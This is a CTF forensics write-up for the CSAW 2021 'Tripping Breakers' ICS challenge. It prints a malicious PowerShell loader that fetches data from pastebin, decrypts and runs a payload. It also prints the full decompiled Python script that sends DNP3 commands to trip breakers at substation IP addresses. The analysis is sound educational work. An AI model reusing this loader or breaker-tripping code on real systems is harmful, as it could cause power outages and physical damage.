<!doctype html><html lang=en-us>
<head>
<meta charset=utf-8>
<meta name=author content>
<meta name=description content>
<meta name=keywords content>
<meta name=viewport content="width=device-width,minimum-scale=1,initial-scale=1">
<meta name=generator content="Hugo 0.88.1">
<link rel=canonical href=https://starfleetcadet75.github.io/posts/csaw-2021-tripping-breakers/>
<meta property="og:title" content="CSAW 2021: Tripping Breakers">
<meta property="og:description" content="Attached is a forensics capture of an HMI (human machine interface) containing scheduled tasks, registry hives, and user profile of an operator account.">
<meta property="og:type" content="article">
<meta property="og:url" content="https://starfleetcadet75.github.io/posts/csaw-2021-tripping-breakers/"><meta property="article:section" content="posts">
<meta property="article:published_time" content="2021-09-12T00:00:00+00:00">
<meta property="article:modified_time" content="2021-09-12T00:00:00+00:00">
<meta name=twitter:card content="summary">
<meta name=twitter:title content="CSAW 2021: Tripping Breakers">
<meta name=twitter:description content="Attached is a forensics capture of an HMI (human machine interface) containing scheduled tasks, registry hives, and user profile of an operator account.">
<meta itemprop=name content="CSAW 2021: Tripping Breakers">
<meta itemprop=description content="Attached is a forensics capture of an HMI (human machine interface) containing scheduled tasks, registry hives, and user profile of an operator account."><meta itemprop=datePublished content="2021-09-12T00:00:00+00:00">
<meta itemprop=dateModified content="2021-09-12T00:00:00+00:00">
<meta itemprop=wordCount content="942">
<meta itemprop=keywords content="forensics,ics,">
<link rel=stylesheet href=/css/layout.css>
<link rel=stylesheet href=/css/default-dark.css>
<link rel=stylesheet href=/css/adoc-html5-extension.css>
<title>
CSAW 2021: Tripping Breakers
</title>
</head>
<body>
<div class=main>
<header>
<div class=header-bar>
<nav>
<div class=siteTitle>
<a href=https://starfleetcadet75.github.io/>starfleetcadet75</a>
</div>
<a class=nav-item href=/about/><div class=nav-item-title>About</div></a>
<a class=nav-item href=/readinglist/><div class=nav-item-title>Reading List</div></a>
<a class="nav-item active" href=/posts/><div class=nav-item-title>Posts</div></a>
</nav>
<div class=social-links-header style=visibility:hidden;display:none>
<a href=mailto:starfleetcadet75@gmail.com><div class=social-link>email</div></a>
<a href=https://github.com/starfleetcadet75 target=_blank><div class=social-link>gh</div></a>
<a href=https://gitlab.com/starfleetcadet75 target=_blank><div class=social-link>gl</div></a>
</div>
</div>
</header>
<article class=post>
<h1 class=title> CSAW 2021: Tripping Breakers </h1>
<div class=content> <p><strong>Category:</strong> ICS<br>
<strong>Points:</strong> 481<br>
<strong>Provided:</strong></p>
<ul>
<li><a href="https://github.com/starfleetcadet75/writeups/blob/master/2021-CSAW/tripping-breakers/hmi_host_data.zip?raw=true">hmi_host_data.zip</a></li>
</ul>
<h2 id=challenge>Challenge</h2>
<blockquote>
<p>Attached is a forensics capture of an HMI (human machine interface) containing scheduled tasks, registry hives, and user profile of an operator account.
There is a scheduled task that executed in April 2021 that tripped various breakers by sending DNP3 messages.
We would like your help clarifying some information.
What was the IP address of the substation_c, and how many total breakers were tripped by this scheduled task? Flag format: flag{IP-Address:# of breakers}.
For example if substation_c&rsquo;s IP address was 192.168.1.2 and there were 45 total breakers tripped, the flag would be flag{192.168.1.2:45}.</p>
</blockquote>
<h2 id=observations>Observations</h2>
<p>We are given a minimal triage image from a Windows system that includes a CSV listing scheduled task information, the SOFTWARE registry hive as a JSON file, and the contents of the user profile for the &ldquo;operator&rdquo; user.</p>
<p>We can open and sort the scheduled tasks by last run time using Timeline Explorer.
The task that stands out is the Powershell script being run from the <code>%temp%</code> directory.</p>
<p><img src=https://raw.githubusercontent.com/starfleetcadet75/writeups/master/2021-CSAW/tripping-breakers/timeline_explorer.png alt=timeline_explorer></p>
<h2 id=solution>Solution</h2>
<p>Fortunately for this investigation, the Powershell script can still be found in the provided user directory.
The script uses base64 to obfuscate two registry keys that it pulls values from.</p>
<p>We can search the provided SOFTWARE registry hive to locate both keys.
The first value is a password and the second is the path to a text file, which is also provided with the triage image.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-powershell data-lang=powershell><span style=color:#75715e># Decodes to &#34;HKLM:\SOFTWARE\Microsoft\Windows\TabletPC\Bell&#34;</span>
$SCOP = ((new-object System.Net.WebClient).DownloadString(<span style=color:#e6db74>&#34;https://pastebin.com/raw/rBXHdE85&#34;</span>)).Replace(<span style=color:#e6db74>&#34;!&#34;</span>,<span style=color:#e6db74>&#34;f&#34;</span>).Replace(<span style=color:#e6db74>&#34;@&#34;</span>,<span style=color:#e6db74>&#34;q&#34;</span>).Replace(<span style=color:#e6db74>&#34;#&#34;</span>,<span style=color:#e6db74>&#34;z&#34;</span>).Replace(<span style=color:#e6db74>&#34;&lt;&#34;</span>,<span style=color:#e6db74>&#34;B&#34;</span>).Replace(<span style=color:#e6db74>&#34;%&#34;</span>,<span style=color:#e6db74>&#34;K&#34;</span>).Replace(<span style=color:#e6db74>&#34;^&#34;</span>,<span style=color:#e6db74>&#34;O&#34;</span>).Replace(<span style=color:#e6db74>&#34;&amp;&#34;</span>,<span style=color:#e6db74>&#34;T&#34;</span>).Replace(<span style=color:#e6db74>&#34;*&#34;</span>,<span style=color:#e6db74>&#34;Y&#34;</span>).Replace(<span style=color:#e6db74>&#34;[&#34;</span>,<span style=color:#e6db74>&#34;4&#34;</span>).Replace(<span style=color:#e6db74>&#34;]&#34;</span>,<span style=color:#e6db74>&#34;9&#34;</span>).Replace(<span style=color:#e6db74>&#34;{&#34;</span>,<span style=color:#e6db74>&#34;=&#34;</span>);
$SLPH = <span style=color:#66d9ef>[Text.Encoding]</span>::UTF8.GetString(<span style=color:#66d9ef>[Convert]</span>::FromBase64 String($SCOP));

<span style=color:#75715e># Reads the string &#34;M4RK_MY_W0Rd5&#34; from the registry key &#34;Blast&#34;</span>
$E = (Get-ItemProperty -Path $SLPH -Name Blast).<span style=color:#e6db74>&#34;Blast&#34;</span>;

<span style=color:#75715e># Decodes to &#34;HKLM:\SOFTWARE\Microsoft\Wbem\Tower&#34;</span>
$TWR = <span style=color:#e6db74>&#34;!M[[pcU09%d^kV&amp;l#9*0XFd]cVG93&lt;&#34;</span>.Replace(<span style=color:#e6db74>&#34;!&#34;</span>,<span style=color:#e6db74>&#34;SEt&#34;</span>).Replace(<span style=color:#e6db74>&#34;@&#34;</span>,<span style=color:#e6db74>&#34;q&#34;</span>).Replace(<span style=color:#e6db74>&#34;#&#34;</span>,<span style=color:#e6db74>&#34;jcm&#34;</span>).Replace(<span style=color:#e6db74>&#34;&lt;&#34;</span>,<span style=color:#e6db74>&#34;ZXI=&#34;</span>).Replace(<span style=color:#e6db74>&#34;%&#34;</span>,<span style=color:#e6db74>&#34;GVF&#34;</span>).Replace(<span style=color:#e6db74>&#34;^&#34;</span>,<span style=color:#e6db74>&#34;BU&#34;</span>).Replace(<span style=color:#e6db74>&#34;&amp;&#34;</span>,<span style=color:#e6db74>&#34;cTW&#34;</span>).Replace(<span style=color:#e6db74>&#34;*&#34;</span>,<span style=color:#e6db74>&#34;zb2Z&#34;</span>).Replace(<span style=color:#e6db74>&#34;[&#34;</span>,<span style=color:#e6db74>&#34;T&#34;</span>).Replace(<span style=color:#e6db74>&#34;]&#34;</span>,<span style=color:#e6db74>&#34;iZW1&#34;</span>).Replace(<span style=color:#e6db74>&#34;{&#34;</span>,<span style=color:#e6db74>&#34;Fdi&#34;</span>);
$BRN = <span style=color:#66d9ef>[Text.Encoding]</span>::UTF8.GetString(<span style=color:#66d9ef>[Convert]</span>::FromBase64String($TWR));

<span style=color:#75715e># Reads the string &#34;\EOTW\151.txt&#34; from the registry key &#34;Off&#34;</span>
$D = (Get-ItemProperty -Path $BRN -Name Off).<span style=color:#e6db74>&#34;Off&#34;</span>;

<span style=color:#75715e># Decrypt the contents of 151.txt and save them as fate.exe</span>
openssl aes-256-cbc -a -A -d -salt -md sha256 -in $env:temp$D -pass pass<span style=color:#960050;background-color:#1e0010>:</span>$E -out <span style=color:#e6db74>&#34;c:\1\fate.exe&#34;</span>;
C:\1\fate.exe;
</code></pre></div><p>We can directly run the openssl command ourselves using the deobfuscated arguments to recover the <a href="https://github.com/starfleetcadet75/writeups/blob/master/2021-CSAW/tripping-breakers/fate.exe?raw=true">fate.exe</a> program.</p>
<pre tabindex=0><code class=language-none data-lang=none>$ file 151.txt
151.txt: openssl enc'd data with salted password, base64 encoded
$ openssl aes-256-cbc -a -A -d -salt -md sha256 -in 151.txt -pass pass:&quot;M4RK_MY_W0Rd5&quot; -out fate.exe
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
$ file fate.exe 
fate.exe: PE32+ executable (console) x86-64, for MS Windows
</code></pre><p>We can quickly determine from the strings that this program is actually just a Python script bundled with PyInstaller.</p>
<pre tabindex=0><code class=language-none data-lang=none>$ strings -n15 fate.exe
PyUnicode_AsUTF8
Failed to get address for PyUnicode_AsUTF8
Error loading Python DLL '%s'.
Error detected starting Python VM.
Failed to get _MEIPASS as PyObject.
PyInstaller: FormatMessageW failed.
PyInstaller: pyi_win32_utils_to_utf8 failed.
</code></pre><p>We can use <a href=https://github.com/extremecoders-re/pyinstxtractor>pyinstxtractor</a> to extract the Python script and then decompile the outputted pyc file using <a href=https://pypi.org/project/uncompyle6/>uncompyle6</a>.</p>
<pre tabindex=0><code class=language-none data-lang=none>python3.6 pyinstxtractor.py fate.exe
uncompyle6 fate.exe_extracted/trip_breakers.pyc
</code></pre><p>Each Python version can <a href=https://github.com/NationalSecurityAgency/ghidra/issues/1165#issuecomment-546714347>introduce slight changes</a> to the way that the marshalling and bytecode work.
In order to completely recover the <a href="https://github.com/starfleetcadet75/writeups/blob/master/2021-CSAW/tripping-breakers/trip_breakers.py?raw=true">full Python script</a>, we must run both tools explicitly using Python 3.6.
This can be done in a virtual environment using pyenv to avoid messing with the system default.</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=color:#75715e># uncompyle6 version 3.7.4</span>
<span style=color:#75715e># Python bytecode 3.6 (3379)</span>
<span style=color:#75715e># Decompiled from: Python 3.6.0 (default, Sep 12 2021, 07:24:49) </span>
<span style=color:#75715e># [GCC 10.3.0]</span>
<span style=color:#75715e># Embedded file name: trip_breakers.py</span>
<span style=color:#f92672>import</span> struct<span style=color:#f92672>,</span> socket<span style=color:#f92672>,</span> time<span style=color:#f92672>,</span> sys
<span style=color:#f92672>from</span> crccheck.crc <span style=color:#f92672>import</span> Crc16Dnp

OPT_1 <span style=color:#f92672>=</span> <span style=color:#ae81ff>3</span>
OPT_2 <span style=color:#f92672>=</span> <span style=color:#ae81ff>4</span>
OPT_3 <span style=color:#f92672>=</span> <span style=color:#ae81ff>66</span>
OPT_4 <span style=color:#f92672>=</span> <span style=color:#ae81ff>129</span>

<span style=color:#66d9ef>class</span> <span style=color:#a6e22e>Substation</span>:
    <span style=color:#66d9ef>def</span> __init__(self, ip_address, devices):
        self<span style=color:#f92672>.</span>target <span style=color:#f92672>=</span> ip_address
        self<span style=color:#f92672>.</span>devices <span style=color:#f92672>=</span> []
        self<span style=color:#f92672>.</span>src <span style=color:#f92672>=</span> <span style=color:#ae81ff>50</span>
        self<span style=color:#f92672>.</span>transport_seq <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>
        self<span style=color:#f92672>.</span>app_seq <span style=color:#f92672>=</span> <span style=color:#ae81ff>10</span>

        <span style=color:#66d9ef>for</span> device <span style=color:#f92672>in</span> devices:
            self<span style=color:#f92672>.</span>add_device(device)

        self<span style=color:#f92672>.</span>connect()

    <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>connect</span>(self):
        print(<span style=color:#e6db74>&#39;Connecting to </span><span style=color:#e6db74>{}</span><span style=color:#e6db74>...&#39;</span><span style=color:#f92672>.</span>format(self<span style=color:#f92672>.</span>target))
        self<span style=color:#f92672>.</span>socket <span style=color:#f92672>=</span> socket<span style=color:#f92672>.</span>socket(socket<span style=color:#f92672>.</span>AF_INET, socket<span style=color:#f92672>.</span>SOCK_STREAM)
        self<span style=color:#f92672>.</span>socket<span style=color:#f92672>.</span>connect((self<span style=color:#f92672>.</span>target, <span style=color:#ae81ff>20000</span>))
        print(<span style=color:#e6db74>&#39;Connected to </span><span style=color:#e6db74>{}</span><span style=color:#e6db74>&#39;</span><span style=color:#f92672>.</span>format(self<span style=color:#f92672>.</span>target))

    <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>add_device</span>(self, device):
        self<span style=color:#f92672>.</span>devices<span style=color:#f92672>.</span>append({<span style=color:#e6db74>&#39;dst&#39;</span>:device[<span style=color:#ae81ff>0</span>],  <span style=color:#e6db74>&#39;count&#39;</span>:device[<span style=color:#ae81ff>1</span>]})

    <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>activate_all_breakers</span>(self, code):
        <span style=color:#66d9ef>for</span> device <span style=color:#f92672>in</span> self<span style=color:#f92672>.</span>devices:
            dnp3_header <span style=color:#f92672>=</span> self<span style=color:#f92672>.</span>get_dnp3_header(device[<span style=color:#e6db74>&#39;dst&#39;</span>])
            <span style=color:#66d9ef>for</span> x <span style=color:#f92672>in</span> range(<span style=color:#ae81ff>1</span>, device[<span style=color:#e6db74>&#39;count&#39;</span>] <span style=color:#f92672>*</span> <span style=color:#ae81ff>2</span>, <span style=color:#ae81ff>2</span>):
                dnp3_packet <span style=color:#f92672>=</span> dnp3_header <span style=color:#f92672>+</span> self<span style=color:#f92672>.</span>get_dnp3_data(x, OPT_1, code)
                self<span style=color:#f92672>.</span>socket<span style=color:#f92672>.</span>send(dnp3_packet)
                time<span style=color:#f92672>.</span>sleep(<span style=color:#ae81ff>2</span>)
                dnp3_packet <span style=color:#f92672>=</span> dnp3_header <span style=color:#f92672>+</span> self<span style=color:#f92672>.</span>get_dnp3_data(x, OPT_2, code)
                self<span style=color:#f92672>.</span>socket<span style=color:#f92672>.</span>send(dnp3_packet)
                time<span style=color:#f92672>.</span>sleep(<span style=color:#ae81ff>5</span>)

    <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>get_dnp3_header</span>(self, dst):
        data <span style=color:#f92672>=</span> struct<span style=color:#f92672>.</span>pack(<span style=color:#e6db74>&#39;&lt;H2B2H&#39;</span>, <span style=color:#ae81ff>25605</span>, <span style=color:#ae81ff>24</span>, <span style=color:#ae81ff>196</span>, dst, self<span style=color:#f92672>.</span>src)
        data <span style=color:#f92672>+=</span> struct<span style=color:#f92672>.</span>pack(<span style=color:#e6db74>&#39;&lt;H&#39;</span>, Crc16Dnp<span style=color:#f92672>.</span>calc(data))
        <span style=color:#66d9ef>return</span> data

    <span style=color:#66d9ef>def</span> <span style=color:#a6e22e>get_dnp3_data</span>(self, index, function, code):
        data <span style=color:#f92672>=</span> struct<span style=color:#f92672>.</span>pack(<span style=color:#e6db74>&#39;&lt;10BIH&#39;</span>, <span style=color:#ae81ff>192</span> <span style=color:#f92672>+</span> self<span style=color:#f92672>.</span>transport_seq, <span style=color:#ae81ff>192</span> <span style=color:#f92672>+</span> self<span style=color:#f92672>.</span>app_seq, function, <span style=color:#ae81ff>12</span>, <span style=color:#ae81ff>1</span>, <span style=color:#ae81ff>23</span>, <span style=color:#ae81ff>1</span>, index, code, <span style=color:#ae81ff>1</span>, <span style=color:#ae81ff>500</span>, <span style=color:#ae81ff>0</span>)
        data <span style=color:#f92672>+=</span> struct<span style=color:#f92672>.</span>pack(<span style=color:#e6db74>&#39;&lt;H&#39;</span>, Crc16Dnp<span style=color:#f92672>.</span>calc(data))
        data <span style=color:#f92672>+=</span> struct<span style=color:#f92672>.</span>pack(<span style=color:#e6db74>&#39;&lt;HBH&#39;</span>, <span style=color:#ae81ff>0</span>, <span style=color:#ae81ff>0</span>, <span style=color:#ae81ff>65535</span>)
        self<span style=color:#f92672>.</span>transport_seq <span style=color:#f92672>+=</span> <span style=color:#ae81ff>1</span>
        self<span style=color:#f92672>.</span>app_seq <span style=color:#f92672>+=</span> <span style=color:#ae81ff>1</span>
        <span style=color:#66d9ef>if</span> self<span style=color:#f92672>.</span>transport_seq <span style=color:#f92672>&gt;=</span> <span style=color:#ae81ff>62</span>:
            self<span style=color:#f92672>.</span>transport_seq <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>
        <span style=color:#66d9ef>if</span> self<span style=color:#f92672>.</span>app_seq <span style=color:#f92672>&gt;=</span> <span style=color:#ae81ff>62</span>:
            self<span style=color:#f92672>.</span>app_seq <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>
        <span style=color:#66d9ef>return</span> data

<span style=color:#66d9ef>def</span> <span style=color:#a6e22e>main</span>():
    <span style=color:#66d9ef>if</span> socket<span style=color:#f92672>.</span>gethostname() <span style=color:#f92672>!=</span> <span style=color:#e6db74>&#39;hmi&#39;</span>:
        sys<span style=color:#f92672>.</span>exit(<span style=color:#ae81ff>1</span>)

    substation_a <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.80&#39;</span>, [(<span style=color:#ae81ff>2</span>, <span style=color:#ae81ff>4</span>), (<span style=color:#ae81ff>19</span>, <span style=color:#ae81ff>8</span>)])
    substation_b <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.81&#39;</span>, [(<span style=color:#ae81ff>9</span>, <span style=color:#ae81ff>5</span>), (<span style=color:#ae81ff>8</span>, <span style=color:#ae81ff>7</span>), (<span style=color:#ae81ff>20</span>, <span style=color:#ae81ff>12</span>), (<span style=color:#ae81ff>15</span>, <span style=color:#ae81ff>19</span>)])
    substation_c <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.82&#39;</span>, [(<span style=color:#ae81ff>14</span>, <span style=color:#ae81ff>14</span>), (<span style=color:#ae81ff>9</span>, <span style=color:#ae81ff>16</span>), (<span style=color:#ae81ff>15</span>, <span style=color:#ae81ff>4</span>), (<span style=color:#ae81ff>12</span>, <span style=color:#ae81ff>5</span>)])
    substation_d <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.83&#39;</span>, [(<span style=color:#ae81ff>20</span>, <span style=color:#ae81ff>17</span>), (<span style=color:#ae81ff>16</span>, <span style=color:#ae81ff>8</span>), (<span style=color:#ae81ff>8</span>, <span style=color:#ae81ff>14</span>)])
    substation_e <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.84&#39;</span>, [(<span style=color:#ae81ff>12</span>, <span style=color:#ae81ff>4</span>), (<span style=color:#ae81ff>13</span>, <span style=color:#ae81ff>5</span>), (<span style=color:#ae81ff>4</span>, <span style=color:#ae81ff>2</span>), (<span style=color:#ae81ff>11</span>, <span style=color:#ae81ff>9</span>)])
    substation_f <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.85&#39;</span>, [(<span style=color:#ae81ff>1</span>, <span style=color:#ae81ff>4</span>), (<span style=color:#ae81ff>3</span>, <span style=color:#ae81ff>9</span>)])
    substation_g <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.86&#39;</span>, [(<span style=color:#ae81ff>10</span>, <span style=color:#ae81ff>14</span>), (<span style=color:#ae81ff>20</span>, <span style=color:#ae81ff>7</span>), (<span style=color:#ae81ff>27</span>, <span style=color:#ae81ff>4</span>)])
    substation_h <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.87&#39;</span>, [(<span style=color:#ae81ff>4</span>, <span style=color:#ae81ff>1</span>), (<span style=color:#ae81ff>10</span>, <span style=color:#ae81ff>9</span>), (<span style=color:#ae81ff>13</span>, <span style=color:#ae81ff>6</span>), (<span style=color:#ae81ff>5</span>, <span style=color:#ae81ff>21</span>)])
    substation_i <span style=color:#f92672>=</span> Substation(<span style=color:#e6db74>&#39;10.95.101.88&#39;</span>, [(<span style=color:#ae81ff>14</span>, <span style=color:#ae81ff>13</span>), (<span style=color:#ae81ff>19</span>, <span style=color:#ae81ff>2</span>), (<span style=color:#ae81ff>8</span>, <span style=color:#ae81ff>6</span>), (<span style=color:#ae81ff>17</span>, <span style=color:#ae81ff>8</span>)])

    substation_a<span style=color:#f92672>.</span>activate_all_breakers(OPT_3)
    substation_b<span style=color:#f92672>.</span>activate_all_breakers(OPT_4)
    substation_c<span style=color:#f92672>.</span>activate_all_breakers(OPT_4)
    substation_d<span style=color:#f92672>.</span>activate_all_breakers(OPT_4)
    substation_e<span style=color:#f92672>.</span>activate_all_breakers(OPT_3)
    substation_f<span style=color:#f92672>.</span>activate_all_breakers(OPT_4)
    substation_g<span style=color:#f92672>.</span>activate_all_breakers(OPT_3)
    substation_h<span style=color:#f92672>.</span>activate_all_breakers(OPT_4)
    substation_i<span style=color:#f92672>.</span>activate_all_breakers(OPT_4)

<span style=color:#66d9ef>if</span> __name__ <span style=color:#f92672>==</span> <span style=color:#e6db74>&#39;__main__&#39;</span>:
    main()
<span style=color:#75715e># okay decompiling fate.exe_extracted/trip_breakers.pyc</span>
</code></pre></div><p>The script shows that substation_c&rsquo;s IP address is 10.95.101.82.
The list passed as the second argument to the <code>Substation</code> class is used to provide the destination address and count of each device connected to that substation.
The second element inside each tuple provides the count of devices that we need to use.
Adding all of the values together incorrectly shows 257 devices.</p>
<p>The question is asking us how many breakers were actually tripped.
Since we have established that substation_c had its breaker&rsquo;s tripped, we can assume that each substation that received a packet using <code>OPT_4</code> was tripped.
Adding only the values from these substations yields the correct answer of 200 total breakers.</p>
<p><strong>Flag:</strong> <code>flag{10.95.101.82:200}</code></p>
</div>
<footer class=post-footer>
<div class=post-footer-data>
<div class=tags>
<div class=tag>
<a href=/tags/forensics>#forensics</a>
</div>
<div class=tag>
<a href=/tags/ics>#ics</a>
</div>
</div>
<div class=post-footer-meta>Permalink: <a href=https://starfleetcadet75.github.io/posts/csaw-2021-tripping-breakers/>/posts/csaw-2021-tripping-breakers/</a> | Date: 2021-09-12 </div>
<hr>
<div class=categories>
Published in:
<div class=category>
<a href=/categories/writeups>writeups</a>
</div>
</div>
<div class=series>
</div>
</div>
</footer>
</article>
<footer>
<div class=social-links-footer>
<a href=mailto:starfleetcadet75@gmail.com><div class=social-link>Email</div></a>
<a href=https://github.com/starfleetcadet75 target=_blank><div class=social-link>GitHub</div></a>
<a href=https://gitlab.com/starfleetcadet75 target=_blank><div class=social-link>GitLab</div></a>
<div class=social-link>
<a href=https://starfleetcadet75.github.io/index.xml target=_blank>RSS</a>
</div>
</div>
<div class=copyright> </div>
<div class=poweredby>
Powered by <a href=https://gohugo.io/>Hugo</a>.
</div>
</footer>
</div>
</body>
</html>